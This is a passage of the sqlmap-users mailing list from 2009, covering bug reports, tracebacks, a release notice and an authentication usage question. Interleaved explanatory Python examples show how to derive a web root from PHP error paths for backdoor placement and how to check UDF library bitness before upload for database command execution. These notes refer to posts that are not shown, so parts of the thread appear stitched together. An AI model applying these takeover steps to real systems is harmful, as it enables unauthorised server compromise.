Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 84, in main
  File "lib\controller\controller.pyc", line 263, in start
  File "lib\controller\action.pyc", line 140, in action
  File "plugins\generic\takeover.pyc", line 295, in osShell
  File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit
  File "lib\request\connect.pyc", line 131, in getPage
  File "urllib2.pyc", line 124, in urlopen
  File "urllib2.pyc", line 383, in open
  File "urllib2.pyc", line 401, in _open
  File "urllib2.pyc", line 361, in _call_chain
  File "urllib2.pyc", line 1130, in http_open
  File "urllib2.pyc", line 1087, in do_open
  File "httplib.pyc", line 656, in __init__
  File "httplib.pyc", line 668, in _set_hostport
InvalidURL: nonnumeric port: '80\test'

[*] shutting down at: 17:37:53
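Two posts in this thread describe the same piece of plumbing from opposite ends: Nacho (2009-08-24) reports the path-extraction regex returning "p:" from "http://" as if it were an absolute path, and Stuffe (above) describes pulling the real path out of a PHP error message and aligning it with the URL path to obtain the document root. The following is an added example, not sqlmap's code, that shows both: the regex as quoted in the report beside a constrained replacement (the replacement is an assumption, not what sqlmap shipped), the PHP error-message extractor Stuffe asks for, and the suffix-matching web-root derivation. The page content it runs on is constructed.

```python
"""Find absolute file paths in page content and derive the web root.

Added example, not sqlmap's code. It covers two reports in this thread: the
regex that returned "p:" from "http://" as an absolute path, and recovering
the document root from a PHP error message by aligning the URL path with the
file-system path it names. SAMPLE_PAGE is constructed.
"""
import re
from urllib.parse import urlparse

# Regex as reported: a single \w before the colon, so the "p" of "http://"
# qualifies and "p://" comes back as a "path". (Raw-string form of the
# pattern quoted on the list; same regex.)
NAIVE_PATH_RE = re.compile(r"([\w]\:[\/\\]+)")

# Replacement (an assumption, not what sqlmap shipped): the drive letter may
# not be preceded by another word or path character, and the whole path is
# captured up to whitespace, markup or a character illegal in Windows names.
DRIVE_PATH_RE = re.compile(r"(?<![\w/\\])([A-Za-z]:[\\/][^\s<>\"'|?*]*)")

# PHP's HTML error format: <b>Type</b>: message in <b>path</b> on line <b>N</b>
PHP_ERROR_RE = re.compile(
    r"<b>(?:Notice|Warning|Parse error|Fatal error)</b>:.*?"
    r"in <b>([^<]+)</b> on line <b>\d+</b>",
    re.S,
)

# Constructed page: two URLs (the false positives) and one PHP notice.
SAMPLE_PAGE = (
    '<a href="http://example.com/forum/">forum</a> '
    '<a href="https://example.org/">tls</a>\n'
    "<br />\n<b>Notice</b>:  Undefined index: b in "
    "<b>C:\\wamp\\www\\whatever\\index.php</b> on line <b>12</b><br />\n"
)


def naive_paths(html):
    """What the reported regex returns: URL scheme fragments plus 'C:\\'."""
    return NAIVE_PATH_RE.findall(html)


def drive_paths(html):
    """Windows absolute paths only, each captured in full."""
    return sorted(set(DRIVE_PATH_RE.findall(html)))


def php_error_paths(html):
    """Script paths named in PHP error messages (works for /unix/paths too)."""
    return sorted(set(PHP_ERROR_RE.findall(html)))


def guess_webroot(url, fs_path):
    """Strip from fs_path the trailing components it shares with the URL path.

    http://host/whatever/index.php + C:\\wamp\\www\\whatever\\index.php
    -> "C:/wamp/www/". Returns None when nothing lines up (URL path is "/",
    or the error names a file outside the URL hierarchy).
    """
    url_parts = [p for p in urlparse(url).path.split("/") if p]
    fs_parts = fs_path.replace("\\", "/").split("/")
    n = 0
    while (n < len(url_parts) and n < len(fs_parts)
           and url_parts[-1 - n].lower() == fs_parts[-1 - n].lower()):
        n += 1
    if n == 0 or n == len(fs_parts):
        return None
    return "/".join(fs_parts[:len(fs_parts) - n]) + "/"


if __name__ == "__main__":
    print("naive:", naive_paths(SAMPLE_PAGE))
    print("drive:", drive_paths(SAMPLE_PAGE))
    for path in php_error_paths(SAMPLE_PAGE):
        print(path, "->", guess_webroot("http://example.com/whatever/index.php", path))
```

The comparison is case-insensitive because Windows paths are; on a Unix target with a case-sensitive file system that choice can only produce a wrong root when two paths differ solely in case, which is rare enough to accept for a guess the user is asked to confirm anyway.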
From: Bernardo D. A. G. <ber...@gm...> - 2009-07-29 11:27:56

Hi Sven,

On Wed, Jul 29, 2009 at 11:50, Sven Klemm<sv...@c3...> wrote:
> ...
> the sqlmap sys_eval function for PostgreSQL does not work on 64-bit
> PostgreSQL because it's 32-bit. There should probably be different
> payloads for 32 bit and 64-bit. I'm seeing the following error in the
> database logs:
> 2009-07-29 12:40:55 CEST ERROR: could not load library
> "/tmp/libsqlmapudfqrwmq.so": /tmp/libsqlmapudfqrwmq.so: wrong ELF
> class: ELFCLASS32

Yes, the shared libraries, both .so and .dll, should be compiled respectively with GCC and Visual C++ on a 64-bit system to work there too. Unfortunately I've no access to any 64-bit system, so you and everyone else are welcome to contribute a pre-compiled 64-bit version of the three .so (MySQL, PostgreSQL 8.2 and PostgreSQL 8.3) and three .dll (MySQL, PostgreSQL 8.2 and PostgreSQL 8.3). The source code is available under the extra/ folder on the SVN repository and in case you need help in compiling them, just get back to me privately; it's not always trivial on Windows.

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Sven K. <sv...@c3...> - 2009-07-29 10:50:43
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

the sqlmap sys_eval function for PostgreSQL does not work on 64-bit PostgreSQL because it's 32-bit. There should probably be different payloads for 32 bit and 64-bit. I'm seeing the following error in the database logs:

2009-07-29 12:40:55 CEST ERROR: could not load library "/tmp/libsqlmapudfqrwmq.so": /tmp/libsqlmapudfqrwmq.so: wrong ELF class: ELFCLASS32

Cheers,
Sven

- --
Sven Klemm
http://cthulhu.c3d2.de/~sven/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpwKXIACgkQevlgTHEIT4ZjhQCfeo69MQVuNhP/yKYCfZsPjN6w
HSUAn11ovBTsYpbSqTDi+EC3bgXF0OI6
=4ACM
-----END PGP SIGNATURE-----
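The `wrong ELF class: ELFCLASS32` error comes from the dynamic loader inside the postgres process: the library's ELF header declares a 32-bit object and the process that has to map it is 64-bit. What must match is the bitness of the DBMS process on the target, not that of the web server or of the machine running sqlmap. The code below is an added example, not part of sqlmap or of this thread, that reads the class, byte order, type and machine fields from an ELF header so a UDF can be checked against the target's bitness before it is uploaded. The minimal header bytes built by `make_sample_elf` are constructed for the self-test and are not a real library.

```python
import struct

# Offsets and values from the ELF specification.
ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA = 4, 5          # positions inside e_ident
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
ET_DYN = 3                        # e_type of a shared object

# e_machine values a pentester is likely to meet on database hosts.
EM_NAMES = {3: "x86", 62: "x86-64", 40: "arm", 183: "aarch64", 8: "mips"}


def elf_info(blob):
    """Return (bits, machine_name, is_shared_object) for the start of an ELF image.

    Only the first 20 bytes are needed: the 16-byte e_ident, then e_type and
    e_machine as two 16-bit fields in the file's own byte order.
    """
    if len(blob) < 20 or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    cls, data = blob[EI_CLASS], blob[EI_DATA]
    if cls not in (ELFCLASS32, ELFCLASS64):
        raise ValueError("unknown ELF class %d" % cls)
    if data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("unknown ELF data encoding %d" % data)
    endian = "<" if data == ELFDATA2LSB else ">"
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    bits = 32 if cls == ELFCLASS32 else 64
    return bits, EM_NAMES.get(e_machine, "machine %d" % e_machine), e_type == ET_DYN


def udf_matches_target(blob, target_bits):
    """True when the library is a shared object whose class matches the DBMS process."""
    bits, _, is_dyn = elf_info(blob)
    return is_dyn and bits == target_bits


def make_sample_elf(bits, machine):
    """Constructed 20-byte ELF header (little-endian, ET_DYN) for offline testing only."""
    e_ident = (ELF_MAGIC
               + bytes([ELFCLASS32 if bits == 32 else ELFCLASS64, ELFDATA2LSB, 1, 0])
               + b"\x00" * 8)
    return e_ident + struct.pack("<HH", ET_DYN, machine)


if __name__ == "__main__":
    import sys
    # Usage: python elfcheck.py libsqlmapudf.so 64
    with open(sys.argv[1], "rb") as fh:
        header = fh.read(64)
    bits, machine, is_dyn = elf_info(header)
    print("%d-bit %s shared object: %s" % (bits, machine, is_dyn))
    print("matches target:", udf_matches_target(header, int(sys.argv[2])))
```

The target's bitness is usually visible before anything is uploaded: on PostgreSQL `SELECT version()` reports the platform the server was built for (for example an `x86_64-...` triplet on Linux builds), so the check can be run against that value rather than discovered from the loader error in the server log.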
From: Bernardo D. A. G. <ber...@gm...> - 2009-07-29 10:46:04
|
Patch tested and committed. Thanks for reporting.

On Wed, Jul 29, 2009 at 10:42, Sven Klemm<sv...@c3...> wrote:
> Hi,
>
> When running sqlmap --dbs on a PostgreSQL backend sqlmap lists all
> the schemas of the current database instead of the names of all
> databases.
> I've attached a patch that fixes the problem.
>
>
> Cheers,
> Sven
>
> --
> Sven Klemm
> http://cthulhu.c3d2.de/~sven/

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2009-07-29 10:45:21
|
Fixed and committed. Thanks for reporting.

On Wed, Jul 29, 2009 at 10:24, Sven Klemm<sv...@c3...> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
>
> I'm getting an exception when running the following command:
>
> ./sqlmap.py -u 'http://10.2.0.100/pg.php?user=sven' -b
>
> The backend database is PostgreSQL 8.3.7 and I'm running sqlmap from SVN.
>
> Here is the backtrace:
>
> sqlmap version: 0.7
> Python version: 2.5.4
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 84, in main
>     start()
>   File "/home/sven/diplom/sqlmap/lib/controller/controller.py", line 263, in start
>     action()
>   File "/home/sven/diplom/sqlmap/lib/controller/action.py", line 49, in action
>     conf.dbmsHandler = setHandler()
>   File "/home/sven/diplom/sqlmap/lib/controller/handler.py", line 67, in setHandler
>     if dbmsHandler.checkDbms():
>   File "/home/sven/diplom/sqlmap/plugins/dbms/postgresql.py", line 203, in checkDbms
>     self.getBanner()
>   File "/home/sven/diplom/sqlmap/plugins/generic/enumeration.py", line 130, in getBanner
>     setOs()
>   File "/home/sven/diplom/sqlmap/lib/core/session.py", line 191, in setOs
>     infoMsg += " Service Pack %d" % kb.osSP
> TypeError: int argument required
>
> Cheers,
> Sven
>
> - --
> Sven Klemm
> http://cthulhu.c3d2.de/~sven/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
>
> iEYEARECAAYFAkpwFWoACgkQevlgTHEIT4YQuQCfW6nT0qnvAb1eubNQ8SvXLhlz
> O/0AnRa5TO9aATy9hnhpt6Y8Lw4T7fDd
> =ErDL
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Sven K. <sv...@c3...> - 2009-07-29 09:43:38
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I'm getting an exception when running the following command:

./sqlmap.py -u 'http://10.2.0.100/pg.php?user=sven' -b

The backend database is PostgreSQL 8.3.7 and I'm running sqlmap from SVN.

Here is the backtrace:

sqlmap version: 0.7
Python version: 2.5.4
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/sven/diplom/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/home/sven/diplom/sqlmap/lib/controller/action.py", line 49, in action
    conf.dbmsHandler = setHandler()
  File "/home/sven/diplom/sqlmap/lib/controller/handler.py", line 67, in setHandler
    if dbmsHandler.checkDbms():
  File "/home/sven/diplom/sqlmap/plugins/dbms/postgresql.py", line 203, in checkDbms
    self.getBanner()
  File "/home/sven/diplom/sqlmap/plugins/generic/enumeration.py", line 130, in getBanner
    setOs()
  File "/home/sven/diplom/sqlmap/lib/core/session.py", line 191, in setOs
    infoMsg += " Service Pack %d" % kb.osSP
TypeError: int argument required

Cheers,
Sven

- --
Sven Klemm
http://cthulhu.c3d2.de/~sven/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpwFWoACgkQevlgTHEIT4YQuQCfW6nT0qnvAb1eubNQ8SvXLhlz
O/0AnRa5TO9aATy9hnhpt6Y8Lw4T7fDd
=ErDL
-----END PGP SIGNATURE-----
From: Sven K. <sv...@c3...> - 2009-07-29 09:42:33
|
Hi,

When running sqlmap --dbs on a PostgreSQL backend sqlmap lists all the schemas of the current database instead of the names of all databases.
I've attached a patch that fixes the problem.

Cheers,
Sven

--
Sven Klemm
http://cthulhu.c3d2.de/~sven/
From: Bernardo D. A. G. <ber...@gm...> - 2009-07-25 23:20:37
|
Hi,

I am glad to release sqlmap version 0.7. Thanks to everyone who contributed really appreciated and useful feedback.

Changes
=======

Along with all the takeover features introduced in sqlmap 0.7 release candidate 1, some of the new features include:

* Adapted Metasploit wrapping functions to work with the latest 3.3 development version too.
* Adjusted code to make sqlmap 0.7 work again on Mac OS X too.
* Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or --os-bof is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This makes sqlmap 0.7 work again on Windows too.
* Minor improvement so that sqlmap tests also all parameters with no value (e.g. par=).
* HTTPS requests over HTTP proxy now work on Python 2.4, 2.5 and 2.6+.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Download
========

You can download it in various formats:

* Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.7.tar.gz
* Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.7.tar.bz2
* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.7.zip
* DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.7-1_all.deb
* RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.7-1.noarch.rpm
* Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.7_exe.zip

Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/

Happy hacking!

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2009-07-17 22:50:44
|
Hi Mathew,

Could you please download the latest development version from the SVN repository, then launch it with the -v 3 option and provide me with the whole log?

Your syntax is correct, maybe just " instead of '.

Thanks,
Bernardo

On Fri, Jul 17, 2009 at 22:06, Mathew Rowley<mat...@ca...> wrote:
> Is there something I'm doing wrong? This is connecting to a local web server
> (run on a virtual machine)
>
> $ ./sqlmap.py -u
> 'http://192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200' --auth-type
> Basic --auth-cred 'guest:guest' -v 3
>
> sqlmap/0.7rc1
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 15:00:01
>
> [15:00:01] [DEBUG] initializing the configuration
> [15:00:01] [DEBUG] initializing the knowledge base
> [15:00:01] [DEBUG] cleaning up configuration parameters
> [15:00:01] [DEBUG] setting the HTTP timeout
> [15:00:01] [DEBUG] setting the HTTP method to GET
> [15:00:01] [DEBUG] setting the HTTP Authentication type and credentials
> [15:00:01] [DEBUG] creating HTTP requests opener object
> [15:00:01] [DEBUG] parsing XML queries file
> [15:00:01] [INFO] testing connection to the target url
> [15:00:01] [ERROR] not authorized, try to provide right HTTP authentication
> type and valid credentials
>
> [*] shutting down at: 15:00:01
> ...

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F
From: Ryan D. <rya...@gm...> - 2009-07-17 21:26:23
|
2009/7/17 Mathew Rowley <mat...@ca...>:
> Is there something I'm doing wrong? This is connecting to a local web server
> (run on a virtual machine)
>

Yes. The command should be:

$ ./sqlmap.py --auth-type=BASIC --auth-cred=guest:guest -v 3 -u 'http://192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200'

> $ ./sqlmap.py -u
> 'http://192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200' --auth-type
> Basic --auth-cred 'guest:guest' -v 3
>
> sqlmap/0.7rc1
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 15:00:01
>
> [15:00:01] [DEBUG] initializing the configuration
> [15:00:01] [DEBUG] initializing the knowledge base
> [15:00:01] [DEBUG] cleaning up configuration parameters
> [15:00:01] [DEBUG] setting the HTTP timeout
> [15:00:01] [DEBUG] setting the HTTP method to GET
> [15:00:01] [DEBUG] setting the HTTP Authentication type and credentials
> [15:00:01] [DEBUG] creating HTTP requests opener object
> [15:00:01] [DEBUG] parsing XML queries file
> [15:00:01] [INFO] testing connection to the target url
> [15:00:01] [ERROR] not authorized, try to provide right HTTP authentication
> type and valid credentials
>
> [*] shutting down at: 15:00:01
>
>
> Wget works fine:
> $ wget
> http://guest:guest@192.168.107.3:8180/WebGoat/attack?Screen=27&menu=1200
> [1] 38059
> atlantis:/Applications/hacking/sqlmap-0.7rc1 $ --2009-07-17 15:02:03--
> http://guest:*password*@192.168.107.3:8180/WebGoat/attack?Screen=27
> Connecting to 192.168.107.3:8180... connected.
> HTTP request sent, awaiting response... 401 Unauthorized
> Reusing existing connection to 192.168.107.3:8180.
> HTTP request sent, awaiting response... 200 OK
> Length: 3914 (3.8K) [text/html]
> Saving to: `attack?Screen=27'
>
> 100%[==========>] 3,914 --.-K/s in 0s
>
> 2009-07-17 15:02:03 (149 MB/s) - `attack?Screen=27' saved [3914/3914]
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
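The `not authorized` line is sqlmap's generic reaction to a 401, and the thing worth reading before retrying is the `WWW-Authenticate` header of that 401: it names the scheme the server actually wants (Basic, Digest, NTLM), which is what `--auth-type` has to match, and the wget run above shows the server accepting the same credentials once they are sent in the right form. The code below is an added example, not sqlmap's own code, that pulls the challenge out of a raw 401 response and builds the Basic `Authorization` value a correct request would carry so the two can be compared against what the tool sends. The response text is constructed for the demonstration and does not come from the WebGoat instance in the thread; the realm is made up.

```python
import base64
import re

# token=value or token="quoted value" inside a challenge, RFC 2617 style.
_PARAM_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|([^\s,]+))')


def parse_challenge(value):
    """Split one WWW-Authenticate value into (scheme, {param: value})."""
    scheme, _, rest = value.strip().partition(" ")
    params = {}
    for m in _PARAM_RE.finditer(rest):
        params[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return scheme, params


def challenges(raw_response):
    """Return (status_code, [(scheme, params), ...]) from a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    found = []
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() == "www-authenticate":
            found.append(parse_challenge(value))
    return status, found


def auth_type_for(raw_response):
    """Scheme name to hand to the client (e.g. --auth-type), or None if there is no challenge."""
    status, found = challenges(raw_response)
    if status != 401 or not found:
        return None
    return found[0][0]


def basic_authorization(user, password):
    """Value of the Authorization header for HTTP Basic: base64 of 'user:password'."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode("utf-8")).decode("ascii")
    return "Basic " + token


# Constructed 401 response; the realm string is invented for the example.
SAMPLE_401 = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "WWW-Authenticate: Basic realm=\"example\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print("server wants:", auth_type_for(SAMPLE_401))
    print("client should send: Authorization:", basic_authorization("guest", "guest"))
```

For the guest:guest pair in the thread the header is `Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=`; capturing the tool's request with `-v 3` or through a proxy and checking whether that header is present, and whether the challenge scheme is really Basic, separates a credential problem from a scheme or option-spelling problem.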